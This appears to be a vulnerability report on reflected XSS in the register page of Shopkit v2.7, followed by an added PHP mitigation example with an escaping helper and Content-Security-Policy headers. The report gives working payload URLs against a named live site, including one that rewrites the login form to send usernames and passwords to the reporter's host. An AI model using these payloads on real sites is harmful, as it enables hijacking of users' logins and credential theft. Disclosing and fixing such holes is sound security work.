In the latest version v2.7
First, I found a reflective XSS vulnerability in register.
The payload is:
"><img/src=x+onerror=alert("XSS_vulnerability")><xss="
https://shopkit.samnabi.com/account/register?email="><img/src=x+onerror=alert("XSS_vulnerability")><xss="
Then, I found this XSS vulnerability could cause login hijacking
"><svg/onload%3d"var+form1+%3d+document.getElementById('loginform')%3bform1.action+%3d+'http%3a//127.0.0.1/test.php'%3b"><xss%3d"
https://shopkit.samnabi.com/account/register?email="><svg/onload%3d"var+form1+%3d+document.getElementById('loginform')%3bform1.action+%3d+'http%3a//127.0.0.1/test.php'%3b"><xss%3d"
When the user enters a username via this link, as shown below
Then click on the "log in"
The username and password will be submitted to my link.
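The mitigation side of the report above, as an added example that is not part of the original issue and is not Shopkit's own code: a hypothetical register-page helper that reflects the `email` parameter unescaped, next to a hardened version, plus a Content-Security-Policy header that blocks both the inline handler and the rewritten form target. The function names and the markup are assumptions.

```php
<?php
// Added example: hypothetical rendering helpers, not Shopkit's actual template.

// Vulnerable: the email query parameter lands in the value attribute as-is,
// so a value beginning with "> closes the attribute and the <input> tag.
function render_email_field_vulnerable(string $email): string
{
    return '<input type="email" name="email" value="' . $email . '">';
}

// Hardened: drop values that are not syntactically valid addresses, then
// encode for the HTML attribute context. Validation alone is not enough,
// because valid addresses may contain characters such as ' (o'brien@...).
function render_email_field_hardened(string $email): string
{
    $valid = filter_var($email, FILTER_VALIDATE_EMAIL);
    $safe  = ($valid === false) ? '' : $valid;
    return '<input type="email" name="email" value="'
        . htmlspecialchars($safe, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8')
        . '">';
}

// Defence in depth: without 'unsafe-inline', inline handlers such as
// onerror/onload do not run; form-action 'self' stops the login form from
// posting credentials to another origin even if its action is rewritten.
function security_headers(): array
{
    return [
        "Content-Security-Policy: default-src 'self'; script-src 'self'; form-action 'self'",
        'X-Content-Type-Options: nosniff',
    ];
}

// Constructed input: the first payload from the report, URL-decoded.
$reported = '"><img/src=x onerror=alert("XSS_vulnerability")><xss="';

$before = render_email_field_vulnerable($reported);
$after  = render_email_field_hardened($reported);

// The vulnerable output contains a live <img> element; the hardened one does not.
echo 'vulnerable breaks out: ', var_export(strpos($before, '<img') !== false, true), PHP_EOL;
echo 'hardened breaks out:   ', var_export(strpos($after, '<img') !== false, true), PHP_EOL;

// A legitimate address with a quote character survives, encoded.
echo render_email_field_hardened("o'brien@example.com"), PHP_EOL;

foreach (security_headers() as $h) {
    echo $h, PHP_EOL; // in a real response these would go through header()
}
```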
5eb0af2